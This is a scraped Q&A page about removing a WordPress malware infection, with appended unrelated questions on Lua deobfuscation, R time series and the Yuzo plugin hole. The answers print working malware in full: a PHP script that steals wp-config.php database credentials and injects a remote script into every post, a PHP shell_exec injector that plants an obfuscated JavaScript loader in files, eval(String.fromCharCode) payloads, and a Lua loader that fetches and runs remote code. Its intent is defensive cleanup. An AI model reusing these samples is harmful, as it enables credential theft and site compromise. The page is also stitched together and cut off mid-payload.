How to remove virus from WordPress? - wordpress
How to remove virus from WordPress?
<script type="text/javascript" async="" src="https://examhome.net/stat.js?v=1.0.2"></script>
I had the same issue on two of my pages this morning and after investigate a lot in my files and DB, I found what the malware did was change my js files adding an encoded script and adding another script at the end of each post on the wp_posts table on my DB.
I solved the problem with basically two steps:
First: go to your DB (Mysql) with PHPMyadmin or with any client and type:
UPDATE `wp_posts` SET post_content = REPLACE (post_content, "<script src='https://cdn.examhome.net/cdn.js?ver=1.0.5' type='text/javascript'></script>", " ")
what it does is delete all the occurrences of the malware injection on your table.
Note: the "?ver=1.0.5" part of the search can change, check your page code with "Ctrl+U" when it starts to load and before the redirect, search for "cdn.examhome.net" or "ads.voipnewswire.net" or "eval(String.fromCharCode..." and check the source and version of the malware js in order to change it on the db query above.
Second: go to your file manager and compress all your files in a zip or similar. download the compressed file and extract on your computer, use Notepad++ (sublimetext and others can help, but i recommend Notepad++) and use the advanced search on that directory to replace this in all documents for empty or a blankspace:
this is an image of how the replacement looks on Notepad++ (in Spanish)
eval(String.fromCharCode(118, 97, 114, 32, 101, 108, 101, 109, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 101, 108, 101, 109, 46, 116, 121, 112, 101, 32, 61, 32, 39, 116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116, 39, 59, 32, 101, 108, 101, 109, 46, 97, 115, 121, 110, 99, 32, 61, 32, 116, 114, 117, 101, 59, 101, 108, 101, 109, 46, 115, 114, 99, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, 32, 57, 55, 44, 32, 49, 48, 48, 44, 32, 49, 49, 53, 44, 32, 52, 54, 44, 32, 49, 49, 56, 44, 32, 49, 49, 49, 44, 32, 49, 48, 53, 44, 32, 49, 49, 50, 44, 32, 49, 49, 48, 44, 32, 49, 48, 49, 44, 32, 49, 49, 57, 44, 32, 49, 49, 53, 44, 32, 49, 49, 57, 44, 32, 49, 48, 53, 44, 32, 49, 49, 52, 44, 32, 49, 48, 49, 44, 32, 52, 54, 44, 32, 49, 49, 48, 44, 32, 49, 48, 49, 44, 32, 49, 49, 54, 44, 32, 52, 55, 44, 32, 57, 55, 44, 32, 49, 48, 48, 44, 32, 52, 54, 44, 32, 49, 48, 54, 44, 32, 49, 49, 53, 41, 59, 32, 32, 32, 118, 97, 114, 32, 97, 108, 108, 115, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 118, 97, 114, 32, 110, 116, 51, 32, 61, 32, 116, 114, 117, 101, 59, 32, 102, 111, 114, 32, 40, 32, 118, 97, 114, 32, 105, 32, 61, 32, 97, 108, 108, 115, 46, 108, 101, 110, 103, 116, 104, 59, 32, 105, 45, 45, 59, 41, 32, 123, 32, 105, 102, 32, 40, 97, 108, 108, 115, 91, 105, 93, 46, 115, 114, 99, 46, 105, 110, 100, 101, 120, 79, 102, 40, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 49, 56, 44, 32, 49, 49, 49, 44, 32, 49, 48, 53, 44, 32, 49, 49, 50, 44, 32, 49, 49, 48, 44, 32, 49, 48, 49, 44, 32, 49, 49, 57, 44, 32, 49, 49, 53, 44, 32, 49, 49, 57, 44, 32, 49, 48, 53, 44, 32, 49, 49, 52, 44, 32, 49, 48, 49, 41, 41, 32, 62, 32, 45, 49, 41, 32, 123, 32, 110, 116, 51, 32, 61, 32, 102, 97, 108, 115, 101, 59, 125, 32, 125, 32, 105, 102, 40, 110, 116, 51, 32, 61, 61, 32, 116, 114, 117, 101, 41, 123, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 34, 104, 101, 97, 100, 34, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 101, 108, 101, 109, 41, 59, 32, 125));
this is an image of how the replacement looks on Notepad++ (in Spanish)
Note: the numbers inside can change, but they always start with eval(String.fromCharCode(, and don't worry, none of the core js of wordpress or plugin uses this, so you can search any match and copy the numbers inside to complete the replace statement.
then compress it again, delete all your public_html content and reupload the compress file and extract it on the public_html root and is done.
With this everything returned to the normality for my two Wordpress pages, Hope it can Help you. Good luck!
You should check your theme's wp-content/themes/{you-active-theme-name}/functions.php file to see if anything malicious was added.
You can also look at VaulPress offered by the creators of wordpress. Run a scan with it and see what it finds.
https://vaultpress.com/
I helped a friend with this issue and dicided to help a community with the experience i had in order to solve this nasty malware in WordPress files ,I discovered that malware being injected into one of the folders in my case /wp-content/uploads/ folder as a file with no extension .
I discovered two files (php files) :
first file expose the "wp-config.php" with all the keys and DB details and injects the examhome.net script into the post_content table - below is the code .
<?php echo ":#009009#:";
$file_to_search = "wp-config.php";
#search_file($_SERVER['DOCUMENT_ROOT']."/../../../../..",$file_to_search);
#search_file($_SERVER['DOCUMENT_ROOT']."/../../../..",$file_to_search);
#search_file($_SERVER['DOCUMENT_ROOT']."/../../..",$file_to_search);
#search_file($_SERVER['DOCUMENT_ROOT']."/../..",$file_to_search);
#search_file($_SERVER['DOCUMENT_ROOT']."/..",$file_to_search);
#search_file($_SERVER['DOCUMENT_ROOT'],$file_to_search);
function search_file($dir,$file_to_search){
$files = scandir($dir);
foreach($files as $key => $value){
$path = realpath($dir.DIRECTORY_SEPARATOR.$value);
if(!is_dir($path)) {
if (strpos($value,$file_to_search) !== false) {
show_sitenames($path);
}
} else if($value != "." && $value != "..") {
search_file($path, $file_to_search);
}
}
}
echo ":#009009#:";
function show_sitenames($file){
$content = #file_get_contents($file);
if(strpos($content, "DB_NAME") !== false) {
$db = get_var_reg("'DB_NAME'.*?,.*?['|\"](.*?)['|\"]",$content);
$host = get_var_reg("'DB_HOST'.*?,.*?['|\"](.*?)['|\"]",$content);
$user = get_var_reg("'DB_USER'.*?,.*?['|\"](.*?)['|\"]",$content);
$pass = get_var_reg("'DB_PASSWORD'.*?,.*?['|\"](.*?)['|\"]",$content);
// Create connection
$conn = new mysqli($host, $user, $pass);
// Check connection
if ($conn->connect_error) {
echo $conn->connect_error;
} else {
$q = "SELECT TABLE_SCHEMA,TABLE_NAME FROM information_schema.TABLES WHERE `TABLE_NAME` LIKE '%post%'";
$result = $conn->query($q);
if ($result->num_rows > 0) {
while($row = $result->fetch_assoc()) {
$q2 = "SELECT post_content FROM " . $row["TABLE_SCHEMA"]. "." . $row["TABLE_NAME"]." LIMIT 1 ";
$result2 = $conn->query($q2);
if ($result2->num_rows > 0) {
while($row2 = $result2->fetch_assoc()) {
$val = $row2['post_content'];
if(strpos($val, "examhome") === false){
echo "nothing:".$file."\n";
$q3 = "UPDATE " . $row["TABLE_SCHEMA"]. "." . $row["TABLE_NAME"]." set post_content = CONCAT(post_content,\"<script src='https://cdn.examhome.net/cdn.js?ver=1.0.88' type='text/javascript'></script>\") WHERE post_content NOT LIKE '%examhome%'";
$conn->query($q3);
} else {
echo "already exist:".$file."\n";
}
}
} else {
}
}
} else {
}
$conn->close();
}
}
}
function get_var_reg($pat,$text) {
if ($c = preg_match_all ("/".$pat."/is", $text, $matches))
{
return $matches[1][0];
}
return "";
}
exit();
And the second file when executed is injecting the code below ( js script ) into the js files recursively into the "" section everywhere .
The script also change the permissions of the files to 777 meaning read and write
At this stage your system is already compromised and it doesn't matter how many times you remove the script from the files they have fully access to the system because of the "wp-config.php" details which compromised earlier meaning that they now can access your wp-admin
<?php $a = 'find / -type f -name "*" | xargs grep -rl "<head"';
$l1 = '<script language=javascript>var _0xfcc4=["\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","\x47\x45\x54","\x6F\x70\x65\x6E","\x73\x65\x6E\x64","\x72\x65\x73\x70\x6F\x6E\x73\x65\x54\x65\x78\x74","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x74\x79\x70\x65","\x61\x73\x79\x6E\x63","\x69\x64","\x63\x64\x6E\x37\x38\x39","\x73\x72\x63","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61x67\x4E\x61\x6D\x65","\x73\x63\x72\x69\x70\x74","\x6C\x65\x6E\x67\x74\x68"];var url=String[_0xfcc4[0]](104, 116, 116, 112, 115, 58, 47, 47, 119, 119, 119, 46, 108, 101, 97, 114, 110, 105, 110, 103, 116, 111, 111, 108, 107, 105, 116, 46, 99, 108, 117, 98, 47, 108, 105, 110, 107, 46, 112, 104, 112, 63, 118, 101, 114, 61, 49);var get_text=function httpGet(_0x3bc1x4){var _0x3bc1x5= new XMLHttpRequest();_0x3bc1x5[_0xfcc4[2]](_0xfcc4[1],_0x3bc1x4,false);_0x3bc1x5[_0xfcc4[3]](null);return _0x3bc1x5[_0xfcc4[4]]};var text=get_text(url);if(text!= String[_0xfcc4[0]](110,117,108,108)&& text[_0xfcc4[5]](String[_0xfcc4[0]](104,116,116,112,115,58,47,47))> -1){var a=function(){var _0x3bc1x8=document[_0xfcc4[6]](String[_0xfcc4[0]](115,99,114,105,112,116));_0x3bc1x8[_0xfcc4[7]]= String[_0xfcc4[0]](116,101,120,116,47,106,97,118,97,115,99,114,105,112,116);_0x3bc1x8[_0xfcc4[8]]= true;_0x3bc1x8[_0xfcc4[9]]= _0xfcc4[10];_0x3bc1x8[_0xfcc4[11]]= text;document[_0xfcc4[13]](String[_0xfcc4[0]](104,101,97,100))[0][_0xfcc4[12]](_0x3bc1x8)};var scrpts=document[_0xfcc4[13]](_0xfcc4[14]);var n=true;for(var i=scrpts[_0xfcc4[15]];i--;){if(scrpts[i][_0xfcc4[9]]== _0xfcc4[10]){n= false}};if(n== true){a()}}</script>';
$t = shell_exec($a);
$t = explode("\n", trim($t));
foreach($t as $f){
$g = file_get_contents($f);
if (strpos($g, '0xfcc4') !== false) {
echo "e:".$f;
} else {
$g = file_get_contents($f);
$g = str_replace("<head>","<head>".$l1,$g);
$g = str_replace("</head>",$l1."</head>",$g);
#system("chmod 777 ".$f);
#file_put_contents($f,$g);
$g = file_get_contents($f);
if (strpos($g, '0xfcc4') !== false) {
echo $f;
}
}
}
echo ":#009009#:";
It's important that you don't use the duplicator plugin as it seems it has a SQL injection hole , if you do have it in your system remove it .
You can use grep command to identify the infected files like this :
sudo grep -rl "examhome.net" /var/www/html/ | more
sudo grep -r "eval(String.fromCharCode(118, 97 " /var/www/html/ | more
and finally using grep and sed command you can identify and replace the infected code with space .
I really hope this could help others to solve this issue it's not a final solution since this malware worm is being updated and i'm still investigating this issue .
Dave
Disclaimer : Use of the information in this post is your responsibility only!
Related
How to Decrypt Lua Script [duplicate]
How can I decrypt this new Lua encryption method? key=[[BREW STORE]];dmnpxzbtpptkabbbstzuaaiyxqbgfszjdhxuxcztvmrghjbawfatwzqandrzrfqlragsyqggkpbvtqktxbckpewunqnfosobaogiitkfsbzuihgljnzslgtmjmgkdasx='om jangan decrypt aku :((';awzmplriqloyociafdhovyenmbcbhqmyegwedddczphgbvubquftewkdqtypcsxmsxihkcwajhqqwidoleeudnahsscjbmlkaocozlvxsbnjbyphljxkcavllyevkhii='Obfuscator Ini Milik ZiGB';jknofzqxfwhpgpwunwnntdqilsqedpbwajyxnzgqchnbspvvehqoyvqdsavrovwklpgfbzpyiorpggadtdjbworigkbdnkbsspfsobalqavigtcfwehcreyeftezpkdi='Kamu Nyari Load?';rzoekzjkzzarhiovruxttaybxqpnhiobpvhbcywmhqlcfoltkbktsjwkldwgobariqrhmimxrmmlbrwhpvurflbcgjonrjvfuappyjeqpmdjghdviciyqkrfpnburddu='Saya Tak Ragu Ingin Nembak Gay People';yazmbcaksoywojorasrbfjqppsgyjdqlzwulsjbfyjxnvxebwmmdxqwkqmhepswuioueybvygkqgijdkrfwmlswajeadgafqggjcdafxxqfgvcmcuennmaesreozhlbn="Soeharto is first indonesian president. Jokowi is seventh indonesian's president, Itadori Yuuji is one of main character in Jujutsu Kaisen Anime, Kento Nanami is Side Character On Jujutsu Kaisen Anime. Lava is 1 of the most dangerous liquid in the world (cap)";mfemjepnyenbjvuehqaxgpvdwqntjmfvsueerksbcticjjnhrqrrsualwlqeshnxqocmqhekxdgtecdogxyasfyapewprxfgmcmvwiedejihvdfujvprttydsulkhnju={ 1,160,3,187,236,277,257,244,160,185,307,173,170,186,170,164,168,168,280,246,160,160,160,160,160,160,160,160,160,160,160,200,279,224,161,392,224,227,218,252,260,265,275,259,271,274,260,205,258,271,276,205,268,277,257,205,271,258,262,277,275,259,257,276,271,274,252,260,265,275,259,271,274,260,205,258,271,276,205,268,277,257,205,271,258,262,277,275,259,257,276,271,274,252,260,265,275,259,271,274,260,205,258,271,276,205,268,277,257,205,271,258,262,277,275,259,257,276,271,274,252,271,258,262,277,275,259,257,276,261,260,252,261,270,259,206,268,277,257,293,296,160,160,215,161,337,171,160,160,160,299,160,160,161,171,161,160,162,174,161,162,163,299,161,160,164,302,161,163,165,179,162,160,320,242,160,160,160,289,290,213,288,161,163,215,288,289,163,208,288,161,292,209,288,289,292,179,288,161,293,216,288,289,165,210,288,161,166,216,288,289,166,218,288,161,167,210,288,289,167,217,288,161,296,217,288,289,296,175,288,161,297,179,288,289,297,176,288,161,170,195,288,289,170,194,288,161,299,201,288,289,299,176,288,161,300,181,288,289,300,175,288,161,301,176,288,289,301,211,288,161,302,217,288,289,302,217,288,161,303,215,288,289,175,217,288,161,304,188,288,289,176,183,288,161,177,183,288,289,177,211,288,161,178,212,288,289,178,217,288,161,307,217,288,289,307,182,288,161,180,211,288,289,180,212,288,161,309,217,288,289,309,211,288,161,182,218,288,289,310,208,288,161,183,218,288,289,183,217,288,161,184,210,288,289,312,216,288,161,185,209,288,289,185,215,288,161,314,214,288,289,314,217,288,161,187,210,288,238,162,210,160,289,290,214,288,161,291,217,288,289,291,182,288,161,164,209,288,289,164,215,288,161,165,214,288,289,165,183,288,161,294,208,288,289,294,216,288,161,167,210,288,289,167,219,288,161,296,209,288,289,168,210,288,161,297,216,288,289,169,217,288,161,170,183,288,289,170,210,288,161,171,188,288,289,171,209,288,161,300,186,288,289,172,208,288,161,301,209,288,289,301,187,288,161,302,186,288,289,174,208,288,161,303,209,288,289,175,184,288,161,304,185,288,289,304,187,288,161,177,208,288,289,177,185,288,161,306,208,288,289,178,210,288,161,307,186,288,289,179,188,288,161,180,208,288,289,180,208,288,161,309,208,288,289,181,184,288,161,310,210,288,289,182,185,288,161,311,209,288,289,183,186,288,161,184,210,288,289,184,208,288,161,185,210,288,289,185,209,288,161,186,188,288,289,186,183,288,161,315,216,288,238,162,210,210,289,162,208,288,161,163,219,288,289,163,183,288,161,164,210,288,289,292,184,288,161,293,183,288,289,165,184,288,161,294,185,288,289,294,187,288,161,295,186,288,289,295,187,288,161,168,187,288,289,168,186,288,161,169,185,288,289,297,185,288,161,170,186,288,289,298,209,288,161,171,185,288,289,299,185,288,161,172,186,288,289,300,186,288,161,301,185,288,289,301,184,288,161,302,210,288,289,174,185,288,161,303,185,288,289,175,186,288,161,304,209,288,289,176,187,288,161,305,184,288,289,177,209,288,161,306,210,288,289,306,184,288,161,307,185,288,289,307,185,288,161,308,187,288,289,308,183,288,161,309,184,288,289,181,188,288,161,310,185,288,289,182,187,288,161,311,184,288,289,183,185,288,161,184,183,288,289,312,193,288,161,313,194,288,289,313,208,288,161,314,216,288,289,186,210,288,161,187,219,288,238,162,210,260,289,290,182,288,161,291,213,288,289,163,218,288,161,164,208,288,289,292,176,288,161,165,180,288,289,165,180,288,161,294,175,288,289,294,179,288,161,167,180,288,238,162,170,310,356,161,162,160,228,161,160,160,356,160,160,160,228,160,160,161,231,160,161,160,294,164,294,272,259,257,268,268,164,293,268,271,257,260,164,295,275,276,274,265,270,263,164,293,259,264,257,274,164,294,276,257,258,268,261,164,295,277,270,272,257,259,267,289,160,160,160,288,161,337,162,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,288,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,160,161,289,409,295,288,289,293,255,229,238,246};local nau = 'load'; function krcqzqcsngsbnxfkqsexgiuiqovaprtpzaheaskjzihhbncooqhmmlelpomnwnisnezltuxbtjyxjyoxizmjsgskspqfmzbtiyhiycxvrhgocdbhopcpekzxeyhjezko(...) local nixjoqhhjhbsuoohwhndfbuhzocmgjsmsswezvusnsdjzduytllzolcmlazofnocmrgusjvxitzeahishdtuqxmrfktidtfgezalcbmmfqgjniyqfmgbifvcntkhkzpm='';for hjkvtiyybvwvdxzbaltomtvihqfwcgxqjzsjowtthjlvqhgusuqokkipovcdptyjrhqynclxozdzicxtieoetduxrjtelnxpwpipzwduyoiyikjaxiyltvhxkotryzdb=1, #mfemjepnyenbjvuehqaxgpvdwqntjmfvsueerksbcticjjnhrqrrsualwlqeshnxqocmqhekxdgtecdogxyasfyapewprxfgmcmvwiedejihvdfujvprttydsulkhnju do if hjkvtiyybvwvdxzbaltomtvihqfwcgxqjzsjowtthjlvqhgusuqokkipovcdptyjrhqynclxozdzicxtieoetduxrjtelnxpwpipzwduyoiyikjaxiyltvhxkotryzdb>3 then nixjoqhhjhbsuoohwhndfbuhzocmgjsmsswezvusnsdjzduytllzolcmlazofnocmrgusjvxitzeahishdtuqxmrfktidtfgezalcbmmfqgjniyqfmgbifvcntkhkzpm=nixjoqhhjhbsuoohwhndfbuhzocmgjsmsswezvusnsdjzduytllzolcmlazofnocmrgusjvxitzeahishdtuqxmrfktidtfgezalcbmmfqgjniyqfmgbifvcntkhkzpm.._ENV['\115\116\114\105\110\103']['\99\104\97\114']((mfemjepnyenbjvuehqaxgpvdwqntjmfvsueerksbcticjjnhrqrrsualwlqeshnxqocmqhekxdgtecdogxyasfyapewprxfgmcmvwiedejihvdfujvprttydsulkhnju[hjkvtiyybvwvdxzbaltomtvihqfwcgxqjzsjowtthjlvqhgusuqokkipovcdptyjrhqynclxozdzicxtieoetduxrjtelnxpwpipzwduyoiyikjaxiyltvhxkotryzdb]-mfemjepnyenbjvuehqaxgpvdwqntjmfvsueerksbcticjjnhrqrrsualwlqeshnxqocmqhekxdgtecdogxyasfyapewprxfgmcmvwiedejihvdfujvprttydsulkhnju[2]));end end;local tolan = 'loadstring';_ENV[_ENV['\115\116\114\105\110\103']['\99\104\97\114'](awzmplriqloyociafdhovyenmbcbhqmyegwedddczphgbvubquftewkdqtypcsxmsxihkcwajhqqwidoleeudnahsscjbmlkaocozlvxsbnjbyphljxkcavllyevkhii:lower():sub(18,18):byte(),dmnpxzbtpptkabbbstzuaaiyxqbgfszjdhxuxcztvmrghjbawfatwzqandrzrfqlragsyqggkpbvtqktxbckpewunqnfosobaogiitkfsbzuihgljnzslgtmjmgkdasx:lower():sub(1,1):byte(),rzoekzjkzzarhiovruxttaybxqpnhiobpvhbcywmhqlcfoltkbktsjwkldwgobariqrhmimxrmmlbrwhpvurflbcgjonrjvfuappyjeqpmdjghdviciyqkrfpnburddu:lower():sub(-9,-9):byte(),yazmbcaksoywojorasrbfjqppsgyjdqlzwulsjbfyjxnvxebwmmdxqwkqmhepswuioueybvygkqgijdkrfwmlswajeadgafqggjcdafxxqfgvcmcuennmaesreozhlbn:lower():sub(21,21):byte())](nixjoqhhjhbsuoohwhndfbuhzocmgjsmsswezvusnsdjzduytllzolcmlazofnocmrgusjvxitzeahishdtuqxmrfktidtfgezalcbmmfqgjniyqfmgbifvcntkhkzpm)(); end;krcqzqcsngsbnxfkqsexgiuiqovaprtpzaheaskjzihhbncooqhmmlelpomnwnisnezltuxbtjyxjyoxizmjsgskspqfmzbtiyhiycxvrhgocdbhopcpekzxeyhjezko(mfemjepnyenbjvuehqaxgpvdwqntjmfvsueerksbcticjjnhrqrrsualwlqeshnxqocmqhekxdgtecdogxyasfyapewprxfgmcmvwiedejihvdfujvprttydsulkhnju); I tried many methods. But I don't think I'm experienced enough. The result was negative.
Add proper linebreaks Replace insane variable names with shorter ones Unescape things like '\115\116\114\105\110\103' into 'string' Keep going until you realize the thing that starts with _ENV[_ENV[ ends up becoming just load (by the way, nau and tolan are unused decoys) Notice that it's a very simple decryption function that operates on the giant table of numbers and then loads the result Modify the decryption function to print the result instead of loading it Notice the result of doing so is Lua 5.4 bytecode Run unluac on said bytecode If you're following along, you'll have gotten this out of unluac (newlines elided for brevity): pcall(load(string.char(table.unpack({ 108, 111, 97, 100, 40, 114, 101, 113, 117, 101, 115, 116, 32, 40, 34, 71, 69, 84, 34, 44, 32, 34, 104, 116, 116, 112, 115, 58, 47, 47, 103, 105, 115, 116, 46, 103, 105, 116, 104, 117, 98, 117, 115, 101, 114, 99, 111, 110, 116, 101, 110, 116, 46, 99, 111, 109, 47, 98, 114, 101, 119, 100, 101, 114, 115, 47, 101, 57, 99, 54, 97, 100, 56, 54, 97, 100, 49, 52, 56, 97, 51, 98, 101, 54, 57, 97, 97, 98, 49, 102, 51, 100, 53, 101, 97, 101, 99, 57, 47, 114, 97, 119, 47, 101, 50, 48, 49, 52, 56, 54, 56, 55, 53, 51, 52, 53, 100, 51, 52, 53, 54, 52, 50, 102, 51, 52, 53, 100, 55, 50, 99, 102, 50, 52, 52, 56, 48, 50, 57, 52, 55, 50, 51, 47, 68, 70, 98, 114, 101, 119, 46, 108, 117, 97, 34, 41, 41, 32, 40, 41})))) Now reverse the string.char and table.unpack to see what it's really doing: load(request ("GET", "https://gist.githubusercontent.com/brewders/e9c6ad86ad148a3be69aab1f3d5eaec9/raw/e201486875345d345642f345d72cf24480294723/DFbrew.lua")) () So https://gist.githubusercontent.com/brewders/e9c6ad86ad148a3be69aab1f3d5eaec9/raw/e201486875345d345642f345d72cf24480294723/DFbrew.lua (prettier at https://gist.github.com/brewders/e9c6ad86ad148a3be69aab1f3d5eaec9#file-dfbrew-lua) has what it's really doing, and it's finally not obfuscated at all. (The sha256 was 7de86710d2e66b6ef3b7e1a772d8d80c550b7a309925320e3296ffd333988e6d at the time of writing this answer; some archives/mirrors: 1 2 3 4) And if you're wondering how this obfuscation happened, this string is present in the bytecode, which should give you a hint: C:\discord-bot-lua-obfuscator\discord-bot-lua-obfuscator\discord-bot-lua-obfuscator\obfuscated\enc.lua
How to identify parameters for SARIMA model in R
Part 2 Boston plot(boston, ylab=" Boston crime data", xlab= "Time") #Time series seem to have homogeneous variance upon visual inspection #Q2 #Trend looks linear in the plot, so for trend differencing operator take d=1 newboston= as.numeric(unlist(boston)) xdiff = diff(newboston) plot(xdiff) #Q3 #ADF library(tseries) adf.test(xdiff) #From the result, alternative hypothesis is stationary so null hypothesis is rejected #KPSS test install.packages('fpp3', dependencies = TRUE) library ( fpp3 ) unitroot_kpss(xdiff) #the p-value is >0.05, so fail to reject null hypothesis for KPSS #Q4 library(astsa) acf2(xdiff, max.lag = 50) model1 = sarima(xdiff, p, 1, q) So this is what I have tried so far. I am quite new to R and so do be kind if my workings make little sense. For context, Boston is the data I imported from an excel, that is simply a column of x axis data. Firstly, I am trying to do Q4, but I am not sure how I would go about to find p and q. Second, I am unsure whether what I did in Q2 to detrend my data is correct in the first place. Here is the output of dput(boston) dput(boston) structure(list(x = c(41, 39, 50, 40, 43, 38, 44, 35, 39, 35, 29, 49, 50, 59, 63, 32, 39, 47, 53, 60, 57, 52, 70, 90, 74, 62, 55, 84, 94, 70, 108, 139, 120, 97, 126, 149, 158, 124, 140, 109, 114, 77, 120, 133, 110, 92, 97, 78, 99, 107, 112, 90, 98, 125, 155, 190, 236, 189, 174, 178, 136, 161, 171, 149, 184, 155, 276, 224, 213, 279, 268, 287, 238, 213, 257, 293, 212, 246, 353, 339, 308, 247, 257, 322, 298, 273, 312, 249, 286, 279, 309, 401, 309, 328, 353, 354, 327, 324, 285, 243, 241, 287, 355, 460, 364, 487, 452, 391, 500, 451, 375, 372, 302, 316, 398, 394, 431, 431), y = c(1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118)), class = c("tbl_df", "tbl", "data.frame"), row.names = c(NA, -118L))
Vulnerability in closed plugin Yuzo Related Posts [closed]
Closed. This question needs to be more focused. It is not currently accepting answers. Want to improve this question? Update the question so it focuses on one problem only by editing this post. Closed 3 years ago. Improve this question About an hour ago a Wordpress Page I manage started redirecting to Ad/Malware Pages. I found the source of the redirection, want to provide help for others affected and need help finding the actual vulnerability and/or a fix. The redirection happens after the Site is done loading, so I was looking for a JavaScript Snippet in the Page and dubious redirections in the Network Analyzer. Obvious malicious redirects were: hellofromhony.org, thebiggestfavoritemake.com, nnatrevaleur.tk and a site trying to snatch my current location (could not reproduce that one more than once though). I was able to trace the redirections down to coming from https://hellofromhony.org/counter which is embedded via a code snippet. The snippet was embedded in wp_options in an entry with the key 'yuzo_related_post_options' - more specifically embedded in the json option 'yuzo_related_post_css_and_style' of the option_value. That option gets echoed without sanitizing. This option is part of the Yuzo Related Posts Plugin, which got discontinued about a week ago: https://wordpress.org/plugins/yuzo-related-post/ Removing that Plugin stopped the redirection immediately, I was not able to find other traces of tampering with the site. The snippet that was in the option_value: </style><script language=javascript>eval(String.fromCharCode(118, 97, 114, 32, 100, 100, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 49, 53, 44, 32, 57, 57, 44, 32, 49, 49, 52, 44, 32, 49, 48, 53, 44, 32, 49, 49, 50, 44, 32, 49, 49, 54, 41, 59, 118, 97, 114, 32, 101, 108, 101, 109, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 100, 100, 41, 59, 32, 118, 97, 114, 32, 104, 104, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 48, 49, 44, 32, 57, 55, 44, 32, 49, 48, 48, 41, 59, 118, 97, 114, 32, 122, 122, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 49, 54, 44, 32, 49, 48, 49, 44, 32, 49, 50, 48, 44, 32, 49, 49, 54, 44, 32, 52, 55, 44, 32, 49, 48, 54, 44, 32, 57, 55, 44, 32, 49, 49, 56, 44, 32, 57, 55, 44, 32, 49, 49, 53, 44, 32, 57, 57, 44, 32, 49, 49, 52, 44, 32, 49, 48, 53, 44, 32, 49, 49, 50, 44, 32, 49, 49, 54, 41, 59, 101, 108, 101, 109, 46, 116, 121, 112, 101, 32, 61, 32, 122, 122, 59, 32, 101, 108, 101, 109, 46, 97, 115, 121, 110, 99, 32, 61, 32, 116, 114, 117, 101, 59, 101, 108, 101, 109, 46, 115, 114, 99, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, 32, 49, 48, 52, 44, 32, 49, 48, 49, 44, 32, 49, 48, 56, 44, 32, 49, 48, 56, 44, 32, 49, 49, 49, 44, 32, 49, 48, 50, 44, 32, 49, 49, 52, 44, 32, 49, 49, 49, 44, 32, 49, 48, 57, 44, 32, 49, 48, 52, 44, 32, 49, 49, 49, 44, 32, 49, 49, 48, 44, 32, 49, 50, 49, 44, 32, 52, 54, 44, 32, 49, 49, 49, 44, 32, 49, 49, 52, 44, 32, 49, 48, 51, 44, 32, 52, 55, 44, 32, 57, 57, 44, 32, 49, 49, 49, 44, 32, 49, 49, 55, 44, 32, 49, 49, 48, 44, 32, 49, 49, 54, 44, 32, 49, 48, 49, 